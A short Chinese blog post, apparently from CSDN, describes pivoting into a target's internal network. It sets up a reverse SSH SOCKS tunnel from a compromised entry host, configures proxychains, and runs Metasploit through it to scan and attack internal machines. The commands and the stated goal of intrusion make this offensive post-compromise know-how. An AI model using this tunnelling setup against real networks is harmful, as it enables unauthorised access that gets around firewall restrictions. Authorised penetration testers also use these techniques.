proxychains

分享一下我老師大神的人工智能教程。零基礎!通俗易懂!風趣幽默!還帶黃段子!希望你也加入到我們人工智能的隊伍中來!https://blog.csdn.net/jiangjunshow

               

上一篇是要藉助外部的工具來實現內網代理,並且有很大的侷限性,如果遠程主機沒開ssh或者做了防火牆規則給過濾掉一般的IP,就不能再用了
這裏我們講一下通過反向代理和本地proxychains來實現內網代理功能,對目標內網進行入侵滲透。不說廢話,看圖文……
蛋疼了,不發圖了,直接寫文字,
大的環境作一下介紹,目標主機是內網不可上網的NN臺服務器,各種環境,各種操作系統都有,入口雞是可以上網的服務器,但是不能終端,不能反彈馬出來,於是考慮用反向SSH結合本地proxychains來作soks代理,對內網機器進行滲透

本地操作系統爲*nix,有外網IP或者映射,開放SSH

於是我們之需要在本地修改一個地方:

編輯 /etc/proxychains.conf

nano /etc/proxychains.conf
要選 dynamic_chain而不是random_chain和strict_chain,即註釋掉strict_chain和random_chain那兩行。
然後在最後的[ProxyList]下面添加:
socks5 127.0.0.1 7070這樣我們在本地的代理端口就是7070,
在遠程入口機器上我們執行
ssh -fND 7070 root@youip
然後我們可以在本地使用我們的proxychain啓動某些程序對內網的機器進行蛋疼的一些動作了,比如掃描什麼的

root@metasploit:/home/exploit# proxychains /pentest/exploits/framework3/msfconsole
ProxyChains-3.1 (http://proxychains.sf.net)
剩下的事情你懂得,我就不多說了,拋了個轉頭,高手一笑而過就可以了,別吐口水,有玉的就砸過來吧,現金先用卡也可以,可兌換支票和債券也可以的……

http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html

http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

           

分享一下我老師大神的人工智能教程。零基礎!通俗易懂!風趣幽默!還帶黃段子!希望你也加入到我們人工智能的隊伍中來!https://blog.csdn.net/jiangjunshow

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章